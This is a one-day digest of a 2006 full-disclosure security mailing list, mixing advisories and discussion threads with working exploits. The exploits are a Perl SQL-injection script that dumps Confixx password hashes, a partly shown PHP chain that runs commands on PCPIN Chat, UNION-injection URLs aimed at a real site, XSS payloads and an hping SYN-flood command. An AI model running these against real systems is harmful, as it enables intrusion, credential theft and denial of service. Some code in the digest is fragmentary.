ASPSitem <= 1.83 Remote SQL Injection Vulnerability

2006-04-19 Thread Mustafa Can Bjorn IPEKCI

--Security Report--
Advisory: ASPSitem <= 1.83 Remote SQL Injection Vulnerability.
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
Date: 19/04/06 19:33 PM
ICQ: 10072
Vendor: ASPSitem (
Version: 1.83 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to id 
parameter in Haberler.asp
Level: Critical
Solution: Upgrade your ASPSitem version to 2.0
GET -> http://[victim]/[ASPSitemDir]/Haberler.asp?haber=devam&id=[SQL]

with this example remote attacker can leak userid 1's login information from 
* 19/04/2006: Vulnerability found.
* 19/04/2006: Contacted with vendor and waiting reply.
Dorks: "Teþekkür ASPSitem"
Original advisory can be found at:

Strengthen OpenSSH security?

2006-04-19 Thread Brett Glass
I'm sure that most folks with hosts that expose an OpenSSH daemon 
to the Internet have been getting the usual probes and password 
guessing attempts and have been taking appropriate actions (e.g. 
setting AllowUsers and using strong passwords) to protect 
yourselves. But today, on one of my servers, I noticed a new trend: 
the attackers are getting smarter. Apparently, they can tell the 
difference between a user ID which is not named in an AllowUsers 
directive -- or which does not exist at all -- from one for which 
they just haven't guessed the correct password. I've now watched as 
some attackers (but not all... yet) tried various user IDs, noted 
which ones existed and were in AllowUsers, and focused password 
guessing attacks on just those user IDs.

It seems to me that sshd should not tip its hand by returning 
different responses when a user ID can be used for logins than when 
it can't -- allowing an attacker to focus password guessing attacks 
on user IDs with which it would have a chance of gaining access. 
For those folks out there who are more familiar with OpenSSH than I 
am: How hard would it be to make the responses indistinguishable?

--Brett Glass

[USN-271-1] Firefox vulnerabilities

2006-04-19 Thread Martin Pitt
Ubuntu Security Notice USN-271-1 April 19, 2006
mozilla-firefox, firefox vulnerabilities
CVE-2005-4134, CVE-2006-0292, CVE-2006-0296, CVE-2006-0749,
CVE-2006-1727, CVE-2006-1728, CVE-2006-1729, CVE-2006-1730,
CVE-2006-1731, CVE-2006-1732, CVE-2006-1733, CVE-2006-1734,
CVE-2006-1735, CVE-2006-1736, CVE-2006-1737, CVE-2006-1738,
CVE-2006-1739, CVE-2006-1740, CVE-2006-1741, CVE-2006-1742,

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:


The problem can be corrected by upgrading the affected package to
version 1.0.8-0ubuntu4.10 (for Ubuntu 4.10), 1.0.8-0ubuntu5.04 (for
Ubuntu 5.04), or 1.0.8-0ubuntu5.10 (for Ubuntu 5.10).  After a
standard system upgrade you need to restart Firefox to effect the
necessary changes.

Details follow:

Web pages with extremely long titles caused subsequent launches of
Firefox browser to hang for up to a few minutes, or caused Firefox to
crash on computers with insufficient memory. (CVE-2005-4134)

Igor Bukanov discovered that the JavaScript engine did not properly
declare some temporary variables. Under some rare circumstances, a
malicious website could exploit this to execute arbitrary code with
the privileges of the user. (CVE-2006-0292, CVE-2006-1742)

The function XULDocument.persist() did not sufficiently validate the
names of attributes. An attacker could exploit this to inject
arbitrary XML code into the file 'localstore.rdf', which is read and
evaluated at startup. This could include JavaScript commands that
would be run with the user's privileges. (CVE-2006-0296)

Due to a flaw in the HTML tag parser a specific sequence of HTML tags
caused memory corruption. A malicious web site could exploit this to
crash the browser or even execute arbitrary code with the user's
privileges. (CVE-2006-0749)

Georgi Guninski discovered that embedded XBL scripts of web sites
could escalate their (normally reduced) privileges to get full
privileges of the user if that page is viewed with "Print Preview".

The crypto.generateCRMFRequest() function had a flaw which could be
exploited to run arbitrary code with the user's privileges.

Claus Jørgensen and Jesse Ruderman discovered that a text input box
could be pre-filled with a filename and then turned into a file-upload
control with the contents intact. A malicious web site could exploit
this to read any local file the user has read privileges for.

An integer overflow was detected in the handling of the CSS property
"letter-spacing". A malicious web site could exploit this to run
arbitrary code with the user's privileges. (CVE-2006-1730)

The methods and .valueOf.apply() returned an object
whose privileges were not properly confined to those of the caller,
which made them vulnerable to cross-site scripting attacks. A
malicious web site could exploit this to modify the contents or steal
confidential data (such as passwords) from other opened web pages.
(CVE-2006-1731) The window.controllers array variable (CVE-2006-1732)
and event handlers (CVE-2006-1741) were vulnerable to a similar attack. 

The privileged built-in XBL bindings were not fully protected from web
content and could be accessed by calling and
valueOf.apply() on a method of that binding. A malicious web site
could exploit this to run arbitrary JavaScript code with the user's
privileges. (CVE-2006-1733)

It was possible to use the method to access an internal
function object (the "clone parent"). A malicious web site could
exploit this to execute arbitrary JavaScript code with the user's
privileges. (CVE-2006-1734)

By calling the XBL.method.eval() method in a special way it was
possible to create JavaScript functions that would get compiled with
the wrong privileges. A malicious web site could exploit this to
execute arbitrary JavaScript code with the user's privileges.

Michael Krax discovered that by layering a transparent image link to
an executable on top of a visible (and presumably desirable) image a
malicious site could fool the user to right-click and choose "Save
image as..." from the context menu, which would download the
executable instead of the image. (CVE-2006-1736)

Several crashes have been fixed which could be triggered by web sites
and involve memory corruption. These could potentially be exploited to
execute arbitrary code with the user's privileges. (CVE-2006-1737,
CVE-2006-1738, CVE-2006-1739, CVE-2006-1790)

If the user has turned on the "Entering secure site" modal warning
dialog, it was possible to spoof the browser's secure-site indicators
(the lock icon and the gold URL field background) by first loading the
target secure site in a pop-up window, t

PCPIN Chat <= 5.0.4 "login/language" remote cmmnds xctn

2006-04-19 Thread rgod
#!/usr/bin/php -q -d short_open_tag=on\r\n\r\n";;
echo "-> works with magic_quotes_gpc = Off\r\n";
echo "dork: \"powered by\"\r\n\r\n";

if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host:  target server (ip/hostname)\r\n";
echo "path:  path to pcpin\r\n";
echo "cmd:   a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /pcpin/ cat ./config/\r\n";
echo "php ".$argv[0]." localhost /pcpin/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";

   software site:
   description: a chat software written in php that uses mysql for data storage

   i) sql injection:
   you can login as admin typing:
   username: ") or isnull(1/0)/*
   password: [whatever]

   query becomes:
   SELECT * FROM pcpin_user WHERE (cookie = "#EMPTY#" AND cookie <> "") OR
   (login = "") or isnull(1/0)/* AND password = "[somehash]") AND activated = 
   LIMIT 1

   ii) arbitrary local inclusion:
   now you can upload smilies with php code inside, we have a local inclusion
   bug in "language" argument when you select a language so, you can include
   a gif file and launch commands...

   both works with magic_quotes_gpc=Off

function quick_dump($string)
  for ($i=0; $i<=strlen($string)-1; $i++)
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 return $exa."\r\n".$result;
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
if (!$ock) {
  echo 'No response from '.$host.':'.$port; die;
  else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
  echo 'Not a valid proxy...';die;
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
if (!$ock) {
  echo 'No response from proxy...';die;
  if ($proxy=='') {
while (!feof($ock)) {
  else {
while ((!feof($ock)) or 
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  #echo "\r\n".$html;

function make_seed()
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 10);


for ($i=3; $i<=$argc-1; $i++){
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
if ($temp=="-P")

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the 
path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

#step 1 -> sql injection, login as admin
echo "[1] login...\r\n";
$sql="\") or isnull(1/0)/*";
$data ="lostpassword=";
$packet ="POST ".$p."main.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
#echo quick_dump($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(" ",$temp[1]);
if ($cookie =='') {die("Unable to retrieve session cookie...");}
echo "Cookie -> ".$cookie."\r\n";
$temp=explode("name=\"session_id\" value=\"",$html);
if ($sid =='') {die("Unable to retrieve session id...");}
echo "session id -> ".$sid."\r\n";

$v = rand(1,9);

#step 2 -> Upload a malicious gif file...
echo "[2] uploading the gif file...\r\n";
Content-Disposition: form-data; name="smiliefile"; filename="suntzu.gif"
Content-Type: image/gif

Content-Disposition: form-data; name="session_id";


[eVuln] N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities

2006-04-19 Thread alex
New eVuln Advisory:
N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities

eVuln ID: EV0121
CVE: CVE-2006-1657 CVE-2006-1658
Vendor: Chucky A. Ivey
Software: N.T.
Sowtware's Web Site:
Versions: 1.1.0
Critical Level: Dangerous
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
PoC/Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (

1. Cross-Site Scripting

Vulnerable Script: index.php

Parameter username is not properly sanitized. This can be used to post 
arbitrary HTML or web script code. This code will be executed when 
administrator will visit "Login Log" page.

Administrator's session is threatened.

2. PHP Code Insertion

Administrator has an ability to edit variables in ticker.db.php file. Script 
dont make any sanitation of entered values. This can be used to insert 
arbitrary PHP code.

System access is possible.

Available at:

No Patch available.

Discovered by: Aliaksandr Hartsuyeu (

Aliaksandr Hartsuyeu - Penetration Testing Services

SQL Injection in

2006-04-19 Thread susam_pal
Vulnerable Page:

Found By: Susam Pal

Found On: 29th March, 2006, Wednesday

Vulnerability Type: SQL Injection

Action Taken: Reported to [EMAIL PROTECTED]

Description: is a tourism website. The site is prone to SQL 
injection which can be exploited to reveal the table 

names, some column names as well as their data types. Exploiting the 
vulnerability requires some reverse engineering. The ASP 

ODBC error messages can be displayed by passing bad values for the parameters 
in the URL.

Example URL 1:'

Error Found: Unclosed quotation mark before the character string ' and 
mncpage.mnccategoryid = mnccategory.mnccategoryid'. 

Conclusion: Direct SQL Injection is possible. There are 2 tables, 'mncpage' and 
'mnccategory'. Both of them have a column 

called 'mnccategoryid'.

Example URL 2: 
order by 1--
Example URL 3: 
order by 2--
Example URL 4: 
order by 3--

Error Found: None

Example URL 5: 
order by 4--

Error Found: The ORDER BY position number 4 is out of range of the number of 
items in the select list.

Conclusion: The table being used by the query selects 3 columns and one of them 
is an integer.

Example URL 6: 
union select 'varchar1', 'varchar2', 'varchar3' 

from mncpage--

Error Found: Syntax error converting the varchar value 'varchar1' to a column 
of data type int.

Conclusion: The 1st column in the select query is an integer.

Error URL 7: 
union select mnccategoryid, 'varchar2', 

'varchar3' from mncpage--

Error Found: None

Conclusion: The column 'mnccategory' is of integer type.

Re: Re[2]: Bypassing ISA Server 2004 with IPv6

2006-04-19 Thread Christine Kronberg

On Sat, 15 Apr 2006, Thor (Hammer of God) wrote:

ISA Server is an application that is installed on top of the base OS. Are
you suggesting that the application should actually prevent the local
administrator of the host machine from installing and configuring what
protocols are bound to what adapters?

  No, I'm suggesting that the application should enable the local
  administrator to configure that application. Configuring a firewall
  is a bit more than setting a domain name. It must contain some
  (preferebly reasonable) filtering mechanisms.
  From what is said so far this seems not to be possible. If that is
  true, ISA is broken by design. We are talking about a firewall. A
  firewall that cannot filter is not a firewall. Agreed?

To me, *that* is the borderline.  There is no such thing as "for what ever
reason ipv6 in enabled on ISA" when it comes to administering an enterprise
firewall product.  If an administrator installs configures ipv6 on the OS of
the firewall, and then binds ipv6 to a protected network segment, then they
absolutely, positively, without-a-doubt get exactly what they deserve.

  Do you think the same applies to ipv4? I said "for what ever reason ipv6
  in enabled on ISA" because I am definitely not in the position to guess
  all possible reasons for activating ipv6.

Anyone who does that without understanding what they are doing are simply
taking jobs away from competent, knowledgeable administrators.

  You are speaking out of my deepest heart. Anyhow, you are aware that
  it is not always the incompentent admin; sometimes it is the incompetent
  superior and not every admin has the nerv and the backing to say no
  to idiotic orders by management.

The mindset of "protecting the ignorant administrator from themselves" in
this business has got to end.  Positioning this as if there is some flaw in


ISA because the application does not prohibit a local administrator from
binding unsupported protocols to interfaces is simply ludicrous. In fact, it

  I still fail to see why an unsupported protocol goes through anyway.
  The reason for implementing a firewall is to separate networks with
  different trust levels. Not to connect them wide open. For this any
  router will do.

is the opposite that is true:  If I as an administrator of a machine want to
bind a protocol to an adapter for some reason (as in a separate, private
segment for use in a particular environment) then I should, indeed MUST, be
able to do it.  And I will be responsible for the implications of doing so.

  Sure. But even in a protected enviroment you may want some additional

There was an earlier thread today where a simple list of hostnames being
filtered from the Win32 HOSTS file was positioned as "deliberate sabotage"
of our machines by Microsoft; a case of "It's my computer- keep your hands
off."  Yet here, the integrity of a product is being challenged because the
application does not prevent an administrator from installing and binding
protocols at the OS-level in cases where the application is not designed to
filter those protocols?  That is a double-standard at its best.

  Again: If that application is a firewall it's a must to be able to
  filter. Anything else is not logical.
  If the application is some funny network gaming tool, then I heartly


  Christine Kronberg.

Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup

2006-04-19 Thread Jamie Riden
On 14/04/06, Brandon S. Allbery KF8NH <[EMAIL PROTECTED]> wrote:
> On Apr 13, 2006, at 1:29 , Dave Korn wrote:
> >   Hey, guess what I just found out:  Microsoft have deliberately
> > sabotaged
> > their DNS client's hosts table lookup functionality.
> I thought this was part of avoiding malware attempts to block Windows
> Update.

In that case, they should allow us to add symantec et al - it's not
much use having Windows Update working while the machine is happily
rootkitted. Grepping hosts files across campus for ...  - or your local equivalent - can prove

If it was a feature, I'd expect there to be ways to add to the list of
pass-through domains, or ways to disable it.

"Microsoft: Bringing the world to your desktop - and your desktop to
 the world." -- Peter Gutmann

Re: Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup

2006-04-19 Thread somerandomaddress99
FYI: is used to point to security bulletins.

In fact, all the domains listed with the exception of are used in the 
Windows and Office patching process.

[eVuln] MD News Authentication Bypass and SQL Injection Vulnerabilities

2006-04-19 Thread alex
New eVuln Advisory:
MD News Authentication Bypass and SQL Injection Vulnerabilities

eVuln ID: EV0120
Software: MD News
Sowtware's Web Site:
Versions: 1
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
PoC/Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (

1. SQL Injection.

Vulnerable script: admin.php

Parameter id is not properly sanitized before being used in SQL query. This can 
be used to make any SQL query by injecting arbitrary SQL code.

2. Authentication Bypass.

"Administration Area" script has no any authentication. Any user can get access 
to administrator's area. (Just need to know script name)

Available at:

No Patch available.

Discovered by: Aliaksandr Hartsuyeu (

Aliaksandr Hartsuyeu - Penetration Testing Services

Re[3]: Bypassing ISA Server 2004 with IPv6

2006-04-19 Thread Christine Kronberg

  Dear 3APA3A,

Microsoft  ISA  Server  can't  filter  events  from Microsoft Mouse, but

  Apples and peas?

Microsoft Mouse can be bound to computer. It's security risk, but I know
how to secure mouse without ISA and I accept this risk.

  Nice, that you do. If I manage by any means to see remotely
  that you have attached a mouse to your ISA and to (ab)use it,
  I'm much better that I thought - and you have much bigger problems
  than you thought.
  The nice thing about icmp is that I do not require much knowledge
  to get information remotely. Same true with ipv6. Unless something
  in between stops me. Which brings us back to the topic: a firewall
  allowing too much.

IPv6  can  not  be  filtered  by  ISA,  but  it still can be filtered by
different  tools,  or  by  it's own means, as IPv6 support network-level
security.  Unlike IPv4, IPv6 supports authentication, integrity checking
and  encryption  natively.  See ipsec6.exe and descriptions for Security
Association Batabase and Security Policy Database.

  So you state that it is perfectly well for a firewall to allow
  any traffic through. Per default? And that this firewall does not
  need to have the interface to configure what traffic is allowed?
  I disagree.
  If a firewall supports a protocol, that same firewall should also
  provide the proper means and interface to configure it. And not blow
  holes in networks.


  Christine Kronberg.

EasyGallery Cross-Site Scripting

2006-04-19 Thread botan
Website :
Author : Botan
Credits : B3g0k,Nistiman,flot,Netqurd
Original Advisory :

Description : "EasyGallery is a simple web-photogallery with a maximum of 
user-friendlyness. All you have to do is to upload your photos and the 
EasyGallery files onto your webspace"

XSS code :[path]/EasyGallery.php?ordner=XSS 

Confixx SQL Injection exploit (

2006-04-19 Thread defa

Well - the patch is out - here is the exploit.

Hey - German hosters - if you call yourself "" -  
why don't you fix your servers?




#  #
# exploit for confixx professional <= 3.1.2 #
#  #
# the vulerability was discovered by: LoK Crew #
# references:   #
#  #
# exploit can be used for any purpose but on own risk  #
#  #
# (c) by defa - sorry for the crappy code  #
#  #
# url is just the host - directory is $url/user/index.php by default  
# the exploit just fetches the longpw hashes of alle  
users #

#  #
# parts of the code are stolen from RuSH exploits - thanks a lot  
folks	   #

use IO::Socket;

if (@ARGV < 1)
print q(
exploit by defa (2006)
= [URL]

[URL] - server url


$serv  = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;

for ($i=0;$i<=100;$i++)
$hit = 0;
$url = "http://";;
$url .= $serv;
$url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";
$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B11,':%22','HIT: 
$url .= "kunde,'%20:%20',longpw,'%20:%20','%22;')%20AS%20'sdata'% 

$url .= "kunden%20LIMIT%20";
$url .= "$i,1/*";

$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "80") || die "[-] CONNECT FAILED\r\n";

print  $socket "GET $url HTTP/1.1\n";
print  $socket "Host: $serv\n";
print  $socket 'User-Agent: confixx_exploit'."\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
if ($answer =~ /HIT:/)
@result = split(/: /,$answer);

print "$result[1]: $result[2]\n";
$hit = 1;

if ($hit == 0) {die("that's it");}

don't eat yellow snow

Re: Re[2]: Bypassing ISA Server 2004 with IPv6

2006-04-19 Thread Thor (Hammer of God)
ISA Server is an application that is installed on top of the base OS. Are
you suggesting that the application should actually prevent the local
administrator of the host machine from installing and configuring what
protocols are bound to what adapters?

To me, *that* is the borderline.  There is no such thing as "for what ever
reason ipv6 in enabled on ISA" when it comes to administering an enterprise
firewall product.  If an administrator installs configures ipv6 on the OS of
the firewall, and then binds ipv6 to a protected network segment, then they
absolutely, positively, without-a-doubt get exactly what they deserve.
Anyone who does that without understanding what they are doing are simply
taking jobs away from competent, knowledgeable administrators.

The mindset of "protecting the ignorant administrator from themselves" in
this business has got to end.  Positioning this as if there is some flaw in
ISA because the application does not prohibit a local administrator from
binding unsupported protocols to interfaces is simply ludicrous. In fact, it
is the opposite that is true:  If I as an administrator of a machine want to
bind a protocol to an adapter for some reason (as in a separate, private
segment for use in a particular environment) then I should, indeed MUST, be
able to do it.  And I will be responsible for the implications of doing so.

There was an earlier thread today where a simple list of hostnames being
filtered from the Win32 HOSTS file was positioned as "deliberate sabotage"
of our machines by Microsoft; a case of "It's my computer- keep your hands
off."  Yet here, the integrity of a product is being challenged because the
application does not prevent an administrator from installing and binding
protocols at the OS-level in cases where the application is not designed to
filter those protocols?  That is a double-standard at its best.


On 4/10/06 12:34 PM, "Christine Kronberg" <[EMAIL PROTECTED]> spoketh to all:

>Thanks for clearing that. But: If ISA is not able to filter IPv6 so
>why can it be bound to an interface anyway? Just to route things
>through? Blindly through a firewall?
>Another posting talks about limited filtering capabilities. Roman
>wrote, icmp went through. So where is the borderline? It still seems
>to me that in the moment for what ever reason ipv6 is enabled on ISA
>the network it should secure is exposed.
>Christine Kronberg.

Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread Geo.
> I agree that there should have been better documentation of this, but I
> think the noted objections are a bit hyperbolic.

While I don't disagree with what you said, I think there are some things you
didn't consider.

First, why is anything besides what is required for windows update being
bypassed? Why MSN.COM? Why NOT I mean this looks more like a
way to keep passport functional than as a way to foil trojans.

Second, why is it that it's darn near impossible to screw with media player
or Messenger (both are protected by Windows file protection) yet hosts file
changes don't even popup a dialog box to ask the user if the change is ok? I
mean this is a really sneaky way of "fixing" things. Also before you say WFP
or a popup could be disabled by a trojan, so could this fix.

Third, this appears to me to be just more half witted fixes imo. The problem
is a trojan modifying hosts then fix the problem instead of ignoring hosts.
Provide a locking mechanism for hosts, remove the trojan, there are a
hundred ways to fix this that are far more proper ways to do things than


Re: gcc 4.1 bug miscompiles pointer range checks, may place you at risk

2006-04-19 Thread Nate Eldredge

On Mon, 17 Apr 2006, Felix von Leitner wrote:

I wrote a small library of functions to do typical range checks as they
are needed in code that handles incoming packets or messages from
untrusted sources.  My impetus was SMB code, in case you want to know.

Here is one of my functions:

static inline int range_ptrinbuf(const void* buf,unsigned long len,const void* 
ptr) {
 register const char* c=(const char*)buf;  /* no pointer arithmetic on 
void* */
 return (c && c+len>c && (const char*)ptr-cc" is the code with which you would
typically check for integer overflows, which is a check that for example
an IP stack would do, or Samba.  So, if you compiled your kernel with
gcc 4.1, or your Samba, or some other packet handling code in a security
relevant context, you might want to recompile with gcc 3.


This is interesting.  But I am not sure that it is really a compiler bug. 
Rules for pointer arithmetic in C are rather restrictive, and stepping 
outside of them results in "undefined behavior".  I don't have the current 
ANSI C standard available, but even my old copy of K&R I says that you 
shouldn't compare pointers which point to different arrays, or you may get 
nonsense.  So I have a suspicion that this code may be illegal, and the 
different compiler versions just happen to have chosen different 

In fact, in some sense the new result is correct.  What if buf is an array 
of size 2^32?  Then buf + 0xU does in fact point to an element of 
buf beyond the 0th, so 'buf + 0xU > buf' is in that sense a true 
statement.  Of course, no existing x86 operating system is set up to work 
like that, but the compiler doesn't know that.

I guess a more general question is "if q is a pointer, and buf is an array 
of size n, how to tell if q points to an element of buf?"  You would like 
to be able to do

q >= buf && q < buf+n

but I think maybe this is not right.  In fact, on a machine with very 
crazy memory management, it might be very difficult or impossible to 
answer that question.

I guess the correct test is not to try to apply the test to the pointer 
but to the index.  E.g. if given an untrusted index i, rather than letting 
q=buf+i and then trying to validate q, just remember the value for i and 
check whether i >= 0 && i <= n.  That seems foolproof to me.

You might want to bring this up on a forum like comp.lang.c where people 
know a lot about the C language.  Alternatively, if you've already 
reported this as a bug to the gcc maintainers (which of course you would 
do before posting to bugtraq, right? :), they will probably be able to 
explain what's going on.

In any case, it's useful to know about this, if nothing else so that 
people know to avoid code like that.  Thanks for bringing it up.

Nate Eldredge

Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread somebody
Just take a binary editor to dnsapi.dll and change the strings to .ccc instead 
of .com

That should fix it, until the next update cycle.

RE: redirection vuln crawlers breed & security through obscurity

2006-04-19 Thread Evans, Arian
1. This is definitely a pretty common, if not well-known
problem, being "broken access control" that relies on
obscurity or something weak/trivial to forge (like an
HTTP refer field path) to control access to an entry
point in a webapp. Sometimes, no further authorization
checks are made (on pages/functions behind the entrypoint).

2. Tools already exist that allow you to manually ignore
redirects per your question blow, and some do this automatically. and are good places to start.

3. This said, "how secure?" in this case is a math problem.
Given you know the directory structure, if all you are doing
is trying to brute-force enumerate the file name, then all
you have is a fuzzing problem plus HTTP requests/sec rate
(that is realistic to achieve).

If your admin default page is "supersexysecretsignon.php"
I can turn a fuzzer lose on this until I get an HTTP 200 OK,
or a change in body content, and automatically flag the page.

In the case above, I have 21 characters to fuzz plus an
page extension, so (21^27 * [$.extensions]) to work through.

I could fuzz *everything* or be lazy and fuzz a variable
and tack on a list of say 10 well-known extensions to each
iteration of the variable.

Assuming I do not know the page name, let's take 50 chars
ASCII/numeric, assume it is case-sensitive on *nix, so you
would have 50^64 possible combinations starting at "a".
Then multiply that times the number of extensions you want
to try, unless you want to fuzz those characters too.

How fast you could work through that keyspace is a good
question. I recommend you Google for Mike Shema's work
on session token entropy from RSA '05 and later, and
he has excellent tables on 'n' HTTP/req/sec = $work_time
to exhaust a given keyspace, which is exactly what you
are essentially asking here I believe.

Excellent questions, again. Two good mailing lists to ask
these sorts of questions on are:


Double-check my math. I haven't my coffee today, adding
to my native processor's already unfortunate tendency to
introduce random floating-point error into my ad-hoc calculations,

Arian J. Evans
FishNet Security

Note: Microsoft Office breaks text-based emails by default.
To see text messages properly formatted, turn off:
Tools>Options>|Email Options|+Remove Extra Line Breaks

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> -Original Message-
> From: Ivan Sergio Borgonovo [mailto:[EMAIL PROTECTED] 
> Sent: Saturday, April 15, 2006 7:47 AM
> To:
> Subject: redirection vuln crawlers breed & security through obscurity
> I just came across such kind of code (php) written by a colegue:
> //
> if($_SESSION['UN']!='hardcoded_UN' or $_SESSION['UN']!='hardcoded_PW')
>   header("Location: ./login.html");
> //missing else to mitigate the problem!!
> //HTML stuff here...
> code structure of all the other "supposed to be" private pages is:
> //wannabeprotected.php
> include_once("include/")
> //wannabe protected code
> Everything resides at something like:
> http://site/admin/
> of course the ONLY thing you've to do to break into the admin 
> interface is:
> - disable redirection in your preferred browser (w3m)
> - guess the right address and
> - point exactly to it: http://site/admin/index.php or any 
> existing page[1] eg. http://site/admin/killingmesoftly.php
> http://site/admin/ won't work. I did some research to see if 
> you could find a way to make "educated guess" by examining 
> the flow of HTTP responses, but I didn't came out with any 
> good idea. Nevertheless index.php doesn't seem to be a bad 
> educated guess (as Default.asp, index.asp,, login.asp...).
> Now some questions and a proposal:
> - how safe is to rely on secrecy of the URL? I'm looking for 
> a quantification of the risk, not a "it is a bad idea" ;)
>  of course http://site/`pwgen -N1 30`/`pwgen -N1 30`.php is 
> safer than http://site/admin/index.php. Any already made 
> study? numbers?
> - are SE like google going to index such kind of pages if 
> there is no "external" link[*]?
> - are there already many specialized vuln crawlers looking 
> for such kind of URLs?
> What about building crawlers that ignore redirection to scan 
> for such kind of vulns?
> I think that kind of mistake should be pretty popular.
> Did I reinvent the wheel?
> [1] this makes educated guessing easier increasing the number 
> of potential targets: manager.php, insert.php, delete.php and 
> it makes this [in]security model rely just on the dir path... 
> unless the programmer is so crazy to call all his files with 
> random names. But coding the access credential in a path 
> makes the code not that relocable... etc... etc..
> [*] What I mean: it exists a chain of links that conn

Tlen.PL e-mail XSS vulnerability.

2006-04-19 Thread koper
As written in:

::File: 060416_XSS_tlen_pl
::Date: 16 Feb 2006
::Author: Tomasz Koperski <[EMAIL PROTECTED]>

Tlen.PL e-mail system is affected to cross-site scripting vulnerability, not 
validating HTML tags in e-mail message subject. 

Tlen.PL is a popular Polish IM system provided by, which includes e-mail 
accounts, and e-mail client built into the 
communicator software (under Windows it is actualy an instance of Internet 
Explorer, displaying webmail system). 
Depending on the server 'assigned' to the account (varying probably by the date 
of registration), webmail client does 
not validate e-mail subject for HTML tags, allowing attacker to inject script 
The vulnerable server is accessed by default with IM client (by older 
The vulnerable server does not provide webmail services through default web 
browser access
(using for ex.:,, yet it is still 
accessible under 
and used inside IM client.
On the account tested (login: koper, served by,, 
registered over 5 years ago), the lenght of 
subject displayed is 28 characters, which is the lenght an attacker can use to 
inject HTML.

An attacker could include some of this code inside the subject field of e-mail 
sent to the target account:"; 

//(28 chars, no HTML ending bracket, still page is displayed 
inside ,
//giving an attacker the ability to include more code. Having shorter domain 
name allows an
//attacker to give valid  tag.


//Displays 2 chars alert window  


None provided, Vendor contacted on 16 Feb 2006.

::6::Systems affected::
All Communicator versions, but not all accounts affected.
Servers checked to be vulnerable: [ ].
Servers checked NOT to be vulnerable: [ ].

Re: Multiple Vulnerabilities in LucidCMS

2006-04-19 Thread zachofalltrades
these vulnerabilites are dealt with for the next release candidate (RC6)

Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread no . spam
Obnoxious, sure, but not hard to beat. (Assuming for some insane reason you are 
actually still using Windows for anything other than playing games)

You just add an entry in your DNS server with a zone matching the hostname that 
you want to override. And if they have the IP addresses of MSFT-controlled DNS 
servers hardcoded, you just add an iptables (or equivalent) entry in your 
firewall (note - this is a seperate device than your wintendo PC, not a peice 
of software running on your PC)

Fortinet28 box does not resist has small synflood!

2006-04-19 Thread testx444
Fortinet28 box does not resist has small synflood on smtp port!
ips protection is not effective because there is not enough syn!
 hping -i u10 -p 25 -S

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ContentBoxx Login.php Cross-Site Scripting

2006-04-19 Thread botan
Website :
Author : Botan


Web Content Management 

ContentBoxX is a professional software upon which the production of editorial 
systems, used in the maintenance of Internet and Intranet offers, are based. 
ContentBoxX is suited for use in demanding Web sites. And, because of its open 
architecture, is up to even the most complex challenges.

Vulnerable :

WWWThread RC 3 MultBugs

2006-04-19 Thread o . y . 6
[code]// --- WWWThread RC 3 MultBugs --- //

* D3vil-0x1 | Devil-00
* Gr33tz
- HACKERS PAL | n0m3rcy | -

All Others << i forgot them :))


//-// [ Bug 1 ] 

// File name :- register.php
// Bug :- Remote [ _COKKIE['forumreferrer] ] SQL Injection

/* Code
$referral_id = $_COOKIE["forumreferrer"];
$result = $db->query('SELECT referral_count FROM 
'.$db->prefix.'users WHERE id='.$referral_id)or 
error(mysql_error(), __FILE__, __LINE__, $db->error());
